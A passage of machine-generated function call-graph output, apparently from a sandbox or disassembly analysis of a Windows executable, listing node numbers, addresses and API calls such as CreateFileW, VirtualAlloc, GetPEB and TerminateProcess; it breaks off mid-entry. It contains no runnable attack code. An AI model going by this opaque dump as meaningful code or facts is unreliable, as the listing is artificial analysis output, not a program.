7b7e8c 98890->98893 98892 7b48f2 98892->98837 98894 7b7ea3 _memmove 98893->98894 98895 7b7e9a 98893->98895 98894->98892 98895->98894 98897 7b7faf 98895->98897 98898 7b7fc2 98897->98898 98900 7b7fbf _memmove 98897->98900 98899 7d0ff6 Mailbox 59 API calls 98898->98899 98899->98900 98900->98894 98902 7b7dbf __wsetenvp 98901->98902 98903 7b8189 59 API calls 98902->98903 98904 7b7dd0 _memmove 98902->98904 98905 7ef130 _memmove 98903->98905 98904->98849 98907 7d0ff6 Mailbox 59 API calls 98906->98907 98908 7b8193 98907->98908 98908->98850 98909->98872 98910 7623b0 98924 760000 98910->98924 98912 762467 98927 7622a0 98912->98927 98930 763490 GetPEB 98924->98930 98926 76068b 98926->98912 98928 7622a9 Sleep 98927->98928 98929 7622b7 98928->98929 98931 7634ba 98930->98931 98931->98926 98932 7b3633 98933 7b366a 98932->98933 98934 7b3688 98933->98934 98935 7b36e7 98933->98935 98973 7b36e5 98933->98973 98939 7b375d PostQuitMessage 98934->98939 98940 7b3695 98934->98940 98937 7ed31c 98935->98937 98938 7b36ed 98935->98938 98936 7b36ca NtdllDefWindowProc_W 98946 7b36d8 98936->98946 98982 7c11d0 10 API calls Mailbox 98937->98982 98941 7b36f2 98938->98941 98942 7b3715 SetTimer RegisterClipboardFormatW 98938->98942 98939->98946 98943 7ed38f 98940->98943 98944 7b36a0 98940->98944 98947 7ed2bf 98941->98947 98948 7b36f9 KillTimer 98941->98948 98942->98946 98949 7b373e CreatePopupMenu 98942->98949 98997 812a16 71 API calls _memset 98943->98997 98950 7b36a8 98944->98950 98951 7b3767 98944->98951 98955 7ed2f8 MoveWindow 98947->98955 98956 7ed2c4 98947->98956 98977 7b44cb Shell_NotifyIconW _memset 98948->98977 98949->98946 98958 7b36b3 98950->98958 98959 7ed374 98950->98959 98980 7b4531 64 API calls _memset 98951->98980 98953 7ed343 98983 7c11f3 340 API calls Mailbox 98953->98983 98955->98946 98963 7ed2c8 98956->98963 98964 7ed2e7 SetFocus 98956->98964 98966 7b374b 98958->98966 98967 7b36be 98958->98967 98959->98936 98996 80817e 59 API calls Mailbox 98959->98996 98960 7ed3a1 98960->98936 98960->98946 98962 7b375b 98962->98946 98963->98967 98968 7ed2d1 98963->98968 98964->98946 98965 7b370c 98978 7b3114 DeleteObject DestroyWindow Mailbox 98965->98978 98979 7b45df 81 API calls _memset 98966->98979 98967->98936 98984 7b44cb Shell_NotifyIconW _memset 98967->98984 98981 7c11d0 10 API calls Mailbox 98968->98981 98973->98936 98975 7ed368 98985 7b43db 98975->98985 98977->98965 98978->98946 98979->98962 98980->98962 98981->98946 98982->98953 98983->98967 98984->98975 98986 7b4406 _memset 98985->98986 98998 7b4213 98986->98998 98989 7b448b 98991 7b44c1 Shell_NotifyIconW 98989->98991 98992 7b44a5 Shell_NotifyIconW 98989->98992 98993 7b44b3 98991->98993 98992->98993 99002 7b410d 98993->99002 98995 7b44ba 98995->98973 98996->98973 98997->98960 98999 7ed638 98998->98999 99000 7b4227 98998->99000 98999->99000 99001 7ed641 DestroyCursor 98999->99001 99000->98989 99024 813226 62 API calls _W_store_winword 99000->99024 99001->99000 99003 7b4129 99002->99003 99023 7b4200 Mailbox 99002->99023 99025 7b7b76 99003->99025 99006 7ed5dd LoadStringW 99010 7ed5f7 99006->99010 99007 7b4144 99008 7b7d2c 59 API calls 99007->99008 99009 7b4159 99008->99009 99009->99010 99011 7b416a 99009->99011 99012 7b7c8e 59 API calls 99010->99012 99013 7b4205 99011->99013 99014 7b4174 99011->99014 99017 7ed601 99012->99017 99015 7b81a7 59 API calls 99013->99015 99030 7b7c8e 99014->99030 99019 7b417e _memset _wcscpy 99015->99019 99018 7b7e0b 59 API calls 99017->99018 99017->99019 99020 7ed623 99018->99020 99021 7b41e6 Shell_NotifyIconW 99019->99021 99022 7b7e0b 59 API calls 99020->99022 99021->99023 99022->99019 99023->98995 99024->98989 99026 7d0ff6 Mailbox 59 API calls 99025->99026 99027 7b7b9b 99026->99027 99028 7b8189 59 API calls 99027->99028 99029 7b4137 99028->99029 99029->99006 99029->99007 99031 7ef094 99030->99031 99032 7b7ca0 99030->99032 99045 808123 59 API calls _memmove 99031->99045 99039 7b7bb1 99032->99039 99035 7b7cac 99035->99019 99036 7ef09e 99037 7b81a7 59 API calls 99036->99037 99038 7ef0a6 Mailbox 99037->99038 99040 7b7bbf 99039->99040 99044 7b7be5 _memmove 99039->99044 99041 7d0ff6 Mailbox 59 API calls 99040->99041 99040->99044 99042 7b7c34 99041->99042 99043 7d0ff6 Mailbox 59 API calls 99042->99043 99043->99044 99044->99035 99045->99036 99046 7eff06 99047 7eff10 99046->99047 99084 7bac90 Mailbox _memmove 99046->99084 99287 7b8e34 59 API calls Mailbox 99047->99287 99048 7d0ff6 59 API calls Mailbox 99048->99084 99052 7d0ff6 59 API calls Mailbox 99073 7ba097 Mailbox 99052->99073 99056 7bb5d5 99058 7b81a7 59 API calls 99056->99058 99057 7b81a7 59 API calls 99057->99073 99068 7ba1b7 99058->99068 99059 7f047f 99291 81a0b5 89 API calls 4 library calls 99059->99291 99060 7bb5da 99297 81a0b5 89 API calls 4 library calls 99060->99297 99064 7b7f41 59 API calls 99064->99084 99065 7b77c7 59 API calls 99065->99073 99066 7f048e 99067 7bb685 99292 81a0b5 89 API calls 4 library calls 99067->99292 99069 7d2f80 67 API calls __cinit 99069->99073 99071 807405 59 API calls 99071->99073 99072 8066f4 Mailbox 59 API calls 99072->99068 99073->99052 99073->99056 99073->99057 99073->99059 99073->99060 99073->99065 99073->99068 99073->99069 99073->99071 99074 7f0e00 99073->99074 99077 7ba6ba 99073->99077 99281 7bca20 340 API calls 2 library calls 99073->99281 99282 7bba60 60 API calls Mailbox 99073->99282 99296 81a0b5 89 API calls 4 library calls 99074->99296 99295 81a0b5 89 API calls 4 library calls 99077->99295 99080 7ba000 340 API calls 99080->99084 99081 7f0c94 99293 7b9df0 59 API calls Mailbox 99081->99293 99083 7f0ca2 99294 81a0b5 89 API calls 4 library calls 99083->99294 99084->99048 99084->99064 99084->99067 99084->99068 99084->99073 99084->99080 99084->99081 99084->99083 99087 7bb37c 99084->99087 99092 7bb416 99084->99092 99094 7bade2 Mailbox 99084->99094 99200 82c5f4 99084->99200 99232 817be0 99084->99232 99238 82bf80 99084->99238 99278 8066f4 99084->99278 99288 807405 59 API calls 99084->99288 99289 82c4a7 85 API calls 2 library calls 99084->99289 99086 7f0c86 99086->99068 99086->99072 99284 7b9e9c 60 API calls Mailbox 99087->99284 99089 7bb38d 99285 7b9e9c 60 API calls Mailbox 99089->99285 99286 7bf803 340 API calls 99092->99286 99094->99067 99094->99068 99094->99086 99096 7f00e0 VariantClear 99094->99096 99101 81d2e6 99094->99101 99148 82474d 99094->99148 99157 82e237 99094->99157 99160 7c2123 99094->99160 99283 7b9df0 59 API calls Mailbox 99094->99283 99290 807405 59 API calls 99094->99290 99096->99094 99102 81d305 99101->99102 99103 81d310 99101->99103 99329 7b9c9c 59 API calls 99102->99329 99107 7b77c7 59 API calls 99103->99107 99143 81d3ea Mailbox 99103->99143 99105 7d0ff6 Mailbox 59 API calls 99106 81d433 99105->99106 99108 81d43f 99106->99108 99386 7b5906 60 API calls Mailbox 99106->99386 99109 81d334 99107->99109 99298 7b9997 99108->99298 99111 7b77c7 59 API calls 99109->99111 99113 81d33d 99111->99113 99114 7b9997 84 API calls 99113->99114 99116 81d349 99114->99116 99330 7b46f9 99116->99330 99120 81d46a GetLastError 99123 81d483 99120->99123 99121 81d49e 99126 81d500 99121->99126 99127 81d4c9 99121->99127 99122 81d35e 99124 7b7c8e 59 API calls 99122->99124 99145 81d3f3 Mailbox 99123->99145 99387 7b5a1a CloseHandle 99123->99387 99125 81d391 99124->99125 99128 81d3e3 99125->99128 99381 813e73 99125->99381 99129 7d0ff6 Mailbox 59 API calls 99126->99129 99130 7d0ff6 Mailbox 59 API calls 99127->99130 99385 7b9c9c 59 API calls 99128->99385 99135 81d505 99129->99135 99131 81d4ce 99130->99131 99136 81d4df 99131->99136 99138 7b77c7 59 API calls 99131->99138 99140 7b77c7 59 API calls 99135->99140 99135->99145 99388 81f835 59 API calls 2 library calls 99136->99388 99138->99136 99139 81d3a5 99142 7b7f41 59 API calls 99139->99142 99140->99145 99144 81d3b2 99142->99144 99143->99105 99143->99145 99384 813c66 63 API calls Mailbox 99144->99384 99145->99094 99147 81d3bb Mailbox 99147->99128 99149 7b9997 84 API calls 99148->99149 99150 824787 99149->99150 99459 7b63a0 99150->99459 99152 824797 99153 8247bc 99152->99153 99154 7ba000 340 API calls 99152->99154 99156 8247c0 99153->99156 99485 7b9bf8 99153->99485 99154->99153 99156->99094 99506 82cdf1 99157->99506 99159 82e247 99159->99094 99161 7b9bf8 59 API calls 99160->99161 99162 7c213b 99161->99162 99164 7d0ff6 Mailbox 59 API calls 99162->99164 99167 7f69af 99162->99167 99165 7c2154 99164->99165 99166 7c2164 99165->99166 99632 7b5906 60 API calls Mailbox 99165->99632 99170 7b9997 84 API calls 99166->99170 99168 7c2189 99167->99168 99636 81f7df 59 API calls 99167->99636 99176 7c2196 99168->99176 99637 7b9c9c 59 API calls 99168->99637 99171 7c2172 99170->99171 99174 7b5956 67 API calls 99171->99174 99173 7f69f7 99175 7f69ff 99173->99175 99173->99176 99177 7c2181 99174->99177 99638 7b9c9c 59 API calls 99175->99638 99179 7b5e3f 2 API calls 99176->99179 99177->99167 99177->99168 99635 7b5a1a CloseHandle 99177->99635 99181 7c219d 99179->99181 99182 7c21b7 99181->99182 99183 7f6a11 99181->99183 99184 7b77c7 59 API calls 99182->99184 99185 7d0ff6 Mailbox 59 API calls 99183->99185 99186 7c21bf 99184->99186 99187 7f6a17 99185->99187 99617 7b56d2 99186->99617 99189 7f6a2b 99187->99189 99639 7b59b0 ReadFile SetFilePointerEx 99187->99639 99194 7f6a2f _memmove 99189->99194 99640 81794e 59 API calls 2 library calls 99189->99640 99190 7c21ce 99190->99194 99633 7b9b9c 59 API calls Mailbox 99190->99633 99195 7c21e2 Mailbox 99196 7c221c 99195->99196 99197 7b5dcf CloseHandle 99195->99197 99196->99094 99198 7c2210 99197->99198 99198->99196 99634 7b5a1a CloseHandle 99198->99634 99201 7b77c7 59 API calls 99200->99201 99202 82c608 99201->99202 99203 7b77c7 59 API calls 99202->99203 99204 82c610 99203->99204 99205 7b77c7 59 API calls 99204->99205 99206 82c618 99205->99206 99207 7b9997 84 API calls 99206->99207 99231 82c626 99207->99231 99208 7b7d2c 59 API calls 99208->99231 99209 82c80f 99210 82c83c Mailbox 99209->99210 99646 7b9b9c 59 API calls Mailbox 99209->99646 99210->99084 99212 82c7f6 99213 7b7e0b 59 API calls 99212->99213 99215 82c803 99213->99215 99214 82c811 99217 7b7e0b 59 API calls 99214->99217 99220 7b7c8e 59 API calls 99215->99220 99216 7b7a84 59 API calls 99216->99231 99221 82c820 99217->99221 99218 7b81a7 59 API calls 99218->99231 99219 7b7faf 59 API calls 99223 82c6bd CharUpperBuffW 99219->99223 99220->99209 99224 7b7c8e 59 API calls 99221->99224 99222 7b7faf 59 API calls 99225 82c77d CharUpperBuffW 99222->99225 99644 7b859a 68 API calls 99223->99644 99224->99209 99645 7bc707 69 API calls 2 library calls 99225->99645 99228 7b9997 84 API calls 99228->99231 99229 7b7e0b 59 API calls 99229->99231 99230 7b7c8e 59 API calls 99230->99231 99231->99208 99231->99209 99231->99210 99231->99212 99231->99214 99231->99216 99231->99218 99231->99219 99231->99222 99231->99228 99231->99229 99231->99230 99233 817bec 99232->99233 99234 7d0ff6 Mailbox 59 API calls 99233->99234 99235 817bfa 99234->99235 99236 817c08 99235->99236 99237 7b77c7 59 API calls 99235->99237 99236->99084 99237->99236 99239 82bfc5 99238->99239 99240 82bfab 99238->99240 99648 82a528 59 API calls Mailbox 99239->99648 99647 81a0b5 89 API calls 4 library calls 99240->99647 99243 82bfd0 99244 7ba000 339 API calls 99243->99244 99245 82c031 99244->99245 99246 82c0c3 99245->99246 99249 82c072 99245->99249 99271 82bfbd Mailbox 99245->99271 99247 82c119 99246->99247 99248 82c0c9 99246->99248 99250 7b9997 84 API calls 99247->99250 99247->99271 99668 817ba4 59 API calls 99248->99668 99649 817581 59 API calls Mailbox 99249->99649 99251 82c12b 99250->99251 99254 7b7faf 59 API calls 99251->99254 99257 82c14f CharUpperBuffW 99254->99257 99255 82c0ec 99669 7b5ea1 59 API calls Mailbox 99255->99669 99256 82c0a2 99650 7bf5c0 99256->99650 99261 82c169 99257->99261 99259 82c0f4 Mailbox 99670 7bfe40 340 API calls 2 library calls 99259->99670 99262 82c170 99261->99262 99263 82c1bc 99261->99263 99671 817581 59 API calls Mailbox 99262->99671 99265 7b9997 84 API calls 99263->99265 99266 82c1c4 99265->99266 99672 7b9fbd 60 API calls 99266->99672 99269 82c19e 99270 7bf5c0 339 API calls 99269->99270 99270->99271 99271->99084 99272 82c1ce 99272->99271 99273 7b9997 84 API calls 99272->99273 99274 82c1e9 99273->99274 99673 7b5ea1 59 API calls Mailbox 99274->99673 99276 82c1f9 99674 7bfe40 340 API calls 2 library calls 99276->99674 100762 806636 99278->100762 99280 806702 99280->99084 99281->99073 99282->99073 99283->99094 99284->99089 99285->99092 99286->99067 99287->99084 99288->99084 99289->99084 99290->99094 99291->99066 99292->99086 99293->99086 99294->99086 99295->99068 99296->99060 99297->99068 99299 7b99b1 99298->99299 99308 7b99ab 99298->99308 99300 7ef9fc __i64tow 99299->99300 99301 7b99b7 __itow 99299->99301 99302 7b99f9 99299->99302 99307 7ef903 99299->99307 99305 7d0ff6 Mailbox 59 API calls 99301->99305 99389 7d38d8 83 API calls 3 library calls 99302->99389 99306 7b99d1 99305->99306 99306->99308 99310 7b7f41 59 API calls 99306->99310 99309 7d0ff6 Mailbox 59 API calls 99307->99309 99314 7ef97b Mailbox _wcscpy 99307->99314 99316 7b5956 99308->99316 99311 7ef948 99309->99311 99310->99308 99312 7d0ff6 Mailbox 59 API calls 99311->99312 99313 7ef96e 99312->99313 99313->99314 99315 7b7f41 59 API calls 99313->99315 99390 7d38d8 83 API calls 3 library calls 99314->99390 99315->99314 99391 7b5dcf 99316->99391 99320 7b59a4 99320->99120 99320->99121 99321 7b5981 99321->99320 99403 7b5770 99321->99403 99323 7b5993 99420 7b53db SetFilePointerEx SetFilePointerEx 99323->99420 99325 7b599a 99325->99320 99326 7ee030 99325->99326 99421 813696 SetFilePointerEx SetFilePointerEx WriteFile 99326->99421 99328 7ee060 99328->99320 99329->99103 99331 7b77c7 59 API calls 99330->99331 99332 7b470f 99331->99332 99333 7b77c7 59 API calls 99332->99333 99334 7b4717 99333->99334 99335 7b77c7 59 API calls 99334->99335 99336 7b471f 99335->99336 99337 7b77c7 59 API calls 99336->99337 99338 7b4727 99337->99338 99339 7b475b 99338->99339 99340 7ed8fb 99338->99340 99341 7b79ab 59 API calls 99339->99341 99342 7b81a7 59 API calls 99340->99342 99343 7b4769 99341->99343 99344 7ed904 99342->99344 99345 7b7e8c 59 API calls 99343->99345 99346 7b7eec 59 API calls 99344->99346 99347 7b4773 99345->99347 99349 7b479e 99346->99349 99348 7b79ab 59 API calls 99347->99348 99347->99349 99352 7b4794 99348->99352 99350 7b47de 99349->99350 99353 7b47bd 99349->99353 99363 7ed924 99349->99363 99437 7b79ab 99350->99437 99356 7b7e8c 59 API calls 99352->99356 99450 7b7b52 99353->99450 99355 7b47ef 99359 7b4801 99355->99359 99361 7b81a7 59 API calls 99355->99361 99356->99349 99357 7ed9f4 99360 7b7d2c 59 API calls 99357->99360 99362 7b4811 99359->99362 99365 7b81a7 59 API calls 99359->99365 99369 7ed9b1 99360->99369 99361->99359 99367 7b4818 99362->99367 99368 7b81a7 59 API calls 99362->99368 99363->99357 99366 7ed9dd 99363->99366 99378 7ed95b 99363->99378 99364 7b79ab 59 API calls 99364->99350 99365->99362 99366->99357 99372 7ed9c8 99366->99372 99370 7b81a7 59 API calls 99367->99370 99377 7b481f Mailbox 99367->99377 99368->99367 99369->99350 99375 7b7b52 59 API calls 99369->99375 99453 7b7a84 59 API calls 2 library calls 99369->99453 99370->99377 99371 7ed9b9 99373 7b7d2c 59 API calls 99371->99373 99374 7b7d2c 59 API calls 99372->99374 99373->99369 99374->99369 99375->99369 99377->99122 99378->99371 99379 7ed9a4 99378->99379 99380 7b7d2c 59 API calls 99379->99380 99380->99369 99455 814696 GetFileAttributesW 99381->99455 99384->99147 99385->99143 99386->99108 99387->99145 99388->99145 99389->99301 99390->99300 99392 7b5962 99391->99392 99393 7b5de8 99391->99393 99395 7b5df9 99392->99395 99393->99392 99394 7b5ded CloseHandle 99393->99394 99394->99392 99396 7b5e12 CreateFileW 99395->99396 99397 7ee181 99395->99397 99400 7b5e34 99396->99400 99398 7ee187 CreateFileW 99397->99398 99397->99400 99399 7ee1ad 99398->99399 99398->99400 99422 7b5c4e 99399->99422 99400->99321 99404 7edfce 99403->99404 99405 7b578b 99403->99405 99419 7b581a 99404->99419 99432 7b5e3f 99404->99432 99406 7b5c4e 2 API calls 99405->99406 99405->99419 99407 7b57ad 99406->99407 99409 7b538e 59 API calls 99407->99409 99410 7b57b7 99409->99410 99410->99404 99411 7b57c4 99410->99411 99412 7d0ff6 Mailbox 59 API calls 99411->99412 99413 7b57cf 99412->99413 99414 7b538e 59 API calls 99413->99414 99415 7b57da 99414->99415 99416 7b5d20 2 API calls 99415->99416 99417 7b5807 99416->99417 99418 7b5c4e 2 API calls 99417->99418 99418->99419 99419->99323 99420->99325 99421->99328 99427 7b5c68 99422->99427 99423 7b5cef SetFilePointerEx 99430 7b5dae SetFilePointerEx 99423->99430 99424 7ee151 99431 7b5dae SetFilePointerEx 99424->99431 99427->99423 99427->99424 99429 7b5cc3 99427->99429 99428 7ee16b 99429->99400 99430->99429 99431->99428 99433 7b5c4e 2 API calls 99432->99433 99434 7b5e60 99433->99434 99435 7b5c4e 2 API calls 99434->99435 99436 7b5e74 99435->99436 99436->99419 99438 7b79ba 99437->99438 99439 7b7a17 99437->99439 99438->99439 99440 7b79c5 99438->99440 99441 7b7e8c 59 API calls 99439->99441 99442 7b79e0 99440->99442 99443 7eef32 99440->99443 99447 7b79e8 _memmove 99441->99447 99454 7b8087 59 API calls Mailbox 99442->99454 99444 7b8189 59 API calls 99443->99444 99446 7eef3c 99444->99446 99448 7d0ff6 Mailbox 59 API calls 99446->99448 99447->99355 99449 7eef5c 99448->99449 99451 7b7faf 59 API calls 99450->99451 99452 7b47c7 99451->99452 99452->99350 99452->99364 99453->99369 99454->99447 99456 813e7a 99455->99456 99457 8146b1 FindFirstFileW 99455->99457 99456->99128 99456->99139 99457->99456 99458 8146c6 FindClose 99457->99458 99458->99456 99460 7b7b76 59 API calls 99459->99460 99480 7b63c5 99460->99480 99461 7b65ca 99500 7b766f 59 API calls 2 library calls 99461->99500 99463 7b65e4 Mailbox 99463->99152 99466 7b7eec 59 API calls 99466->99480 99467 7b766f 59 API calls 99467->99480 99468 7ee41f 99503 80fdba 91 API calls 4 library calls 99468->99503 99469 7b68f9 99469->99463 99505 80fdba 91 API calls 4 library calls 99469->99505 99473 7ee42d 99504 7b766f 59 API calls 2 library calls 99473->99504 99475 7ee443 99475->99463 99476 7ee3bb 99477 7b8189 59 API calls 99476->99477 99479 7ee3c6 99477->99479 99483 7d0ff6 Mailbox 59 API calls 99479->99483 99480->99461 99480->99466 99480->99467 99480->99468 99480->99469 99480->99476 99481 7b7faf 59 API calls 99480->99481 99484 7ee3eb _memmove 99480->99484 99498 7b60cc 60 API calls 99480->99498 99499 7b5ea1 59 API calls Mailbox 99480->99499 99501 7b5fd2 60 API calls 99480->99501 99502 7b7a84 59 API calls 2 library calls 99480->99502 99482 7b659b CharUpperBuffW 99481->99482 99482->99480 99483->99484 99484->99468 99484->99469 99486 7efbff 99485->99486 99487 7b9c08 99485->99487 99488 7efc10 99486->99488 99489 7b7d2c 59 API calls 99486->99489 99491 7d0ff6 Mailbox 59 API calls 99487->99491 99490 7b7eec 59 API calls 99488->99490 99489->99488 99492 7efc1a 99490->99492 99493 7b9c1b 99491->99493 99495 7b9c34 99492->99495 99496 7b77c7 59 API calls 99492->99496 99493->99492 99494 7b9c26 99493->99494 99494->99495 99497 7b7f41 59 API calls 99494->99497 99495->99156 99496->99495 99497->99495 99498->99480 99499->99480 99500->99463 99501->99480 99502->99480 99503->99473 99504->99475 99505->99463 99507 7b9997 84 API calls 99506->99507 99508 82ce2e 99507->99508 99528 82ce75 Mailbox 99508->99528 99544 82dab9 99508->99544 99510 82d0cd 99511 82d242 99510->99511 99515 82d0db 99510->99515 99594 82dbdc 92 API calls Mailbox 99511->99594 99514 82d251 99514->99515 99517 82d25d 99514->99517 99557 82cc82 99515->99557 99516 7b9997 84 API calls 99527 82cec6 Mailbox 99516->99527 99517->99528 99522 82d114 99572 7d0e48 99522->99572 99525 82d147 99579 7b942e 99525->99579 99526 82d12e 99578 81a0b5 89 API calls 4 library calls 99526->99578 99527->99510 99527->99516 99527->99528 99576 81f835 59 API calls 2 library calls 99527->99576 99577 82d2f3 61 API calls 2 library calls 99527->99577 99528->99159 99531 82d139 GetCurrentProcess TerminateProcess 99531->99525 99536 82d2b8 99536->99528 99540 82d2cc FreeLibrary 99536->99540 99537 82d17f 99591 82d95d 107 API calls _free 99537->99591 99540->99528 99543 82d190 99543->99536 99592 7b8ea0 59 API calls Mailbox 99543->99592 99593 7b9e9c 60 API calls Mailbox 99543->99593 99595 82d95d 107 API calls _free 99543->99595 99545 7b7faf 59 API calls 99544->99545 99546 82dad4 CharLowerBuffW 99545->99546 99596 80f658 99546->99596 99550 7b77c7 59 API calls 99551 82db0d 99550->99551 99552 7b79ab 59 API calls 99551->99552 99553 82db24 99552->99553 99554 7b7e8c 59 API calls 99553->99554 99555 82db30 Mailbox 99554->99555 99556 82db6c Mailbox 99555->99556 99603 82d2f3 61 API calls 2 library calls 99555->99603 99556->99527 99558 82cc9d 99557->99558 99559 82ccf2 99557->99559 99560 7d0ff6 Mailbox 59 API calls 99558->99560 99563 82dd64 99559->99563 99562 82ccbf 99560->99562 99561 7d0ff6 Mailbox 59 API calls 99561->99562 99562->99559 99562->99561 99564 82df8d Mailbox 99563->99564 99570 82dd87 _strcat _wcscpy __wsetenvp 99563->99570 99564->99522 99565 7b9cf8 59 API calls 99565->99570 99566 7b9d46 59 API calls 99566->99570 99567 7b9c9c 59 API calls 99567->99570 99568 7b9997 84 API calls 99568->99570 99569 7d594c 58 API calls std::exception::_Copy_str 99569->99570 99570->99564 99570->99565 99570->99566 99570->99567 99570->99568 99570->99569 99606 815b29 61 API calls 2 library calls 99570->99606 99573 7d0e5d 99572->99573 99574 7d0ef5 VirtualAlloc 99573->99574 99575 7d0ec3 99573->99575 99574->99575 99575->99525 99575->99526 99576->99527 99577->99527 99578->99531 99580 7b9436 99579->99580 99581 7d0ff6 Mailbox 59 API calls 99580->99581 99582 7b9444 99581->99582 99583 7b9450 99582->99583 99607 7b935c 59 API calls Mailbox 99582->99607 99585 7b91b0 99583->99585 99608 7b92c0 99585->99608 99587 7d0ff6 Mailbox 59 API calls 99589 7b925b 99587->99589 99588 7b91bf 99588->99587 99588->99589 99589->99543 99590 7b8ea0 59 API calls Mailbox 99589->99590 99590->99537 99591->99543 99592->99543 99593->99543 99594->99514 99595->99543 99597 80f683 __wsetenvp 99596->99597 99598 80f6c2 99597->99598 99601 80f6b8 99597->99601 99602 80f769 99597->99602 99598->99550 99598->99555 99601->99598 99604 7b7a24 61 API calls 99601->99604 99602->99598 99605 7b7a24 61 API calls 99602->99605 99603->99556 99604->99601 99605->99602 99606->99570 99607->99583 99609 7b92c9 Mailbox 99608->99609 99610 7ef5c8 99609->99610 99615 7b92d3 99609->99615 99611 7d0ff6 Mailbox 59 API calls 99610->99611 99613 7ef5d4 99611->99613 99612 7b92da 99612->99588 99615->99612 99616 7b9df0 59 API calls Mailbox 99615->99616 99616->99615 99618 7b56dd 99617->99618 99619 7b5702 99617->99619 99618->99619 99621 7b56ec 99618->99621 99620 7b7eec 59 API calls 99619->99620 99624 81349a 99620->99624 99625 7b5c18 59 API calls 99621->99625 99622 8134c9 99622->99190 99624->99622 99641 813436 ReadFile SetFilePointerEx 99624->99641 99642 7b7a84 59 API calls 2 library calls 99624->99642 99626 8135ba 99625->99626 99628 7b5632 61 API calls 99626->99628 99629 8135c8 99628->99629 99631 8135d8 Mailbox 99629->99631 99643 7b793a 61 API calls Mailbox 99629->99643 99631->99190 99632->99166 99633->99195 99634->99196 99635->99167 99636->99167 99637->99173 99638->99181 99639->99189 99640->99194 99641->99624 99642->99624 99643->99631 99644->99231 99645->99231 99646->99210 99647->99271 99648->99243 99649->99256 99651 7bf61a 99650->99651 99652 7bf7b0 99650->99652 99654 7f4848 99651->99654 99655 7bf626 99651->99655 99653 7b7f41 59 API calls 99652->99653 99661 7bf6ec Mailbox 99653->99661 99656 82bf80 340 API calls 99654->99656 99758 7bf3f0 340 API calls 2 library calls 99655->99758 99658 7f4856 99656->99658 99662 7bf790 99658->99662 99760 81a0b5 89 API calls 4 library calls 99658->99760 99660 7bf65d 99660->99658 99660->99661 99660->99662 99664 7bf743 99661->99664 99665 813e73 3 API calls 99661->99665 99675 82e24b 99661->99675 99678 81cde5 99661->99678 99662->99271 99664->99662 99759 7b9df0 59 API calls Mailbox 99664->99759 99665->99664 99668->99255 99669->99259 99670->99271 99671->99269 99672->99272 99673->99276 99674->99271 99676 82cdf1 130 API calls 99675->99676 99677 82e25b 99676->99677 99677->99664 99679 7b77c7 59 API calls 99678->99679 99680 81ce1a 99679->99680 99681 7b77c7 59 API calls 99680->99681 99682 81ce23 99681->99682 99683 81ce37 99682->99683 99894 7b9c9c 59 API calls 99682->99894 99685 7b9997 84 API calls 99683->99685 99686 81ce54 99685->99686 99687 81cf55 99686->99687 99688 81ce76 99686->99688 99699 81cf85 Mailbox 99686->99699 99761 7b4f3d 99687->99761 99689 7b9997 84 API calls 99688->99689 99692 81ce82 99689->99692 99694 7b81a7 59 API calls 99692->99694 99693 81cf81 99697 7b77c7 59 API calls 99693->99697 99693->99699 99695 81ce8e 99694->99695 99701 81cea2 99695->99701 99702 81ced4 99695->99702 99696 7b4f3d 135 API calls 99696->99693 99698 81cfb6 99697->99698 99700 7b77c7 59 API calls 99698->99700 99699->99664 99703 81cfbf 99700->99703 99704 7b81a7 59 API calls 99701->99704 99705 7b9997 84 API calls 99702->99705 99706 7b77c7 59 API calls 99703->99706 99707 81ceb2 99704->99707 99708 81cee1 99705->99708 99709 81cfc8 99706->99709 99711 7b7e0b 59 API calls 99707->99711 99712 7b81a7 59 API calls 99708->99712 99710 7b77c7 59 API calls 99709->99710 99713 81cfd1 99710->99713 99714 81cebc 99711->99714 99715 81ceed 99712->99715 99717 7b9997 84 API calls 99713->99717 99718 7b9997 84 API calls 99714->99718 99895 814cd3 GetFileAttributesW 99715->99895 99720 81cfde 99717->99720 99721 81cec8 99718->99721 99719 81cef6 99724 7b7b52 59 API calls 99719->99724 99727 81cf09 99719->99727 99722 7b46f9 59 API calls 99720->99722 99723 7b7c8e 59 API calls 99721->99723 99725 81cff9 99722->99725 99723->99702 99724->99727 99728 7b7b52 59 API calls 99725->99728 99726 7b9997 84 API calls 99729 81cf36 99726->99729 99727->99726 99733 81cf0f 99727->99733 99730 81d008 99728->99730 99896 813a2b 75 API calls Mailbox 99729->99896 99732 81d03c 99730->99732 99735 7b7b52 59 API calls 99730->99735 99734 7b81a7 59 API calls 99732->99734 99733->99699 99736 81d04a 99734->99736 99737 81d019 99735->99737 99738 7b7c8e 59 API calls 99736->99738 99737->99732 99740 7b7d2c 59 API calls 99737->99740 99739 81d058 99738->99739 99741 7b7c8e 59 API calls 99739->99741 99742 81d02e 99740->99742 99743 81d066 99741->99743 99744 7b7d2c 59 API calls 99742->99744 99745 7b7c8e 59 API calls 99743->99745 99744->99732 99746 81d074 99745->99746 99747 7b9997 84 API calls 99746->99747 99748 81d080 99747->99748 99785 8142ad 99748->99785 99750 81d091 99751 813e73 3 API calls 99750->99751 99752 81d09b 99751->99752 99753 7b9997 84 API calls 99752->99753 99756 81d0cc 99752->99756 99754 81d0b9 99753->99754 99839 8193df 99754->99839 99897 7b4faa 99756->99897 99758->99660 99759->99664 99760->99662 99903 7b4d13 99761->99903 99766 7edd0f 99769 7b4faa 84 API calls 99766->99769 99767 7b4f68 LoadLibraryExW 99913 7b4cc8 99767->99913 99771 7edd16 99769->99771 99773 7b4cc8 3 API calls 99771->99773 99775 7edd1e 99773->99775 99774 7b4f8f 99774->99775 99776 7b4f9b 99774->99776 99939 7b506b 99775->99939 99777 7b4faa 84 API calls 99776->99777 99779 7b4fa0 99777->99779 99779->99693 99779->99696 99782 7edd45 99947 7b5027 99782->99947 99786 8142c9 99785->99786 99787 8142dc 99786->99787 99788 8142ce 99786->99788 99790 7b77c7 59 API calls 99787->99790 99789 7b81a7 59 API calls 99788->99789 99838 8142d7 Mailbox 99789->99838 99791 8142e4 99790->99791 99792 7b77c7 59 API calls 99791->99792 99793 8142ec 99792->99793 99794 7b77c7 59 API calls 99793->99794 99795 8142f7 99794->99795 99796 7b77c7 59 API calls 99795->99796 99797 8142ff 99796->99797 99798 7b77c7 59 API calls 99797->99798 99799 814307 99798->99799 99800 7b77c7 59 API calls 99799->99800 99801 81430f 99800->99801 99802 7b77c7 59 API calls 99801->99802 99803 814317 99802->99803 99804 7b77c7 59 API calls 99803->99804 99805 81431f 99804->99805 99806 7b46f9 59 API calls 99805->99806 99807 814336 99806->99807 99808 7b46f9 59 API calls 99807->99808 99809 81434f 99808->99809 99810 7b7b52 59 API calls 99809->99810 99811 81435b 99810->99811 99812 81436e 